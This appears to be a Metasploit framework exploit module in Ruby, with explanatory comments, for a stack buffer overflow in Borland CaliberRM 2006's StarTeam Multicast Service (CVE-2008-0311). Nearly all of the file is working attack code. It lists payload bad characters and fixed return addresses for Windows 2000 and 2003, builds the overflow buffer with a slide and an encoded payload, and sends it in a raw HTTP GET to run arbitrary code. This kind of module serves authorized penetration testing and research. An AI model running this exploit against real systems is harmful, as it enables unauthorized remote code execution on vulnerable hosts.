Path: blob/master/modules/exploits/windows/misc/borland_starteam.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Borland CaliberRM 2006 / StarTeam Multicast Service (STMulticastService)
# stack buffer overflow, CVE-2008-0311.
#
# The overflow is triggered through the request line of a raw HTTP GET, so
# every byte of the buffer (including the encoded payload) must survive being
# sent as a URI.  That is why the BadChars list below is essentially the set
# of URI delimiters: NUL, ':', '&', '?', '%', '#', space, CR/LF, '/', '+',
# VT and backslash.
#
# Return addresses are fixed per OS/service-pack/language (targets are both
# "English"); they are presumably jump-to-stack style trampolines in a
# system DLL of that exact build, but that cannot be verified from this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata with the framework and the one option this
  # module needs beyond the HttpClient mixin defaults (RPORT, default 3057).
  #
  # Payload notes:
  #   * 'Space' => 600 bytes available for the encoded payload.
  #   * 'StackAdjustment' => -3500 and 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
  #     say the same thing twice: the prepended bytes decode to
  #     `add esp, 0xfffff254` (= -3500), moving ESP below the payload so the
  #     decoder stub does not overwrite itself.
  #   * 'Privileged' => true: the module declares that the payload runs with
  #     elevated privileges (the service account); not verifiable here.
  #
  # @param info [Hash] framework-supplied metadata, merged via update_info
  def initialize(info = {})
    references = [
      [ 'CVE', '2008-0311' ],
      [ 'OSVDB', '44039' ],
      [ 'BID', '28602' ],
    ]

    payload_opts = {
      'Space'           => 600,
      'BadChars'        => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
      'StackAdjustment' => -3500,
      'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff",
    }

    targets = [
      [ 'Windows 2000 SP4 English', { 'Ret' => 0x7c5729db } ],
      [ 'Windows 2003 SP0 English', { 'Ret' => 0x71ae1f9b } ],
    ]

    super(update_info(info,
      'Name'           => 'Borland CaliberRM StarTeam Multicast Service Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending
        a specially crafted GET request to the STMulticastService, an attacker may be
        able to execute arbitrary code.
      },
      'Author'         => 'MC',
      'References'     => references,
      'DefaultOptions' => { 'EXITFUNC' => 'process' },
      'Payload'        => payload_opts,
      'Platform'       => 'win',
      'Targets'        => targets,
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2008-04-02'))

    register_options([Opt::RPORT(3057)])
  end

  # Builds the overflow buffer, sends it as the URI of a raw GET and hands
  # off to the payload handler.
  #
  # Buffer layout (byte counts are what this module sends; the vulnerable
  # copy itself is not visible here, so the reason for the NUL at offset 511
  # and for the 156-byte slide is not documented):
  #
  #   511 random bytes, one NUL, 1020 random bytes   -> reaches the saved return
  #   target 'Ret', packed little-endian 32-bit       -> overwritten return address
  #   156 x '@' (0x40)                                -> presumably a NOP-like slide
  #                                                      (0x40 is `inc eax` on x86)
  #   encoded payload                                 -> author's note: inline
  #                                                      payloads work best
  #   1..100 random bytes                             -> trailing junk
  #
  # No response is read: success is only observable through the handler.
  def exploit
    # Filler up to the saved return address.
    request = "#{rand_text_english(511)}\x00#{rand_text_english(1020)}"

    ret   = [target.ret].pack('V')
    slide = '@' * 156 # the original author marked this line with ":(" — see layout above
    tail  = rand_text_english(rand(100) + 1)

    # inline payloads work best (original author's note)
    [ret, slide, payload.encoded, tail].each { |part| request << part }

    print_status("Trying target #{target.name}...")

    # Raw send: the buffer goes out as the request URI without any encoding,
    # hence the URI-delimiter BadChars in the module metadata.  The second
    # argument is the per-request timeout (seconds).
    send_request_raw({ 'uri' => request }, 5)

    handler
    disconnect
  end
end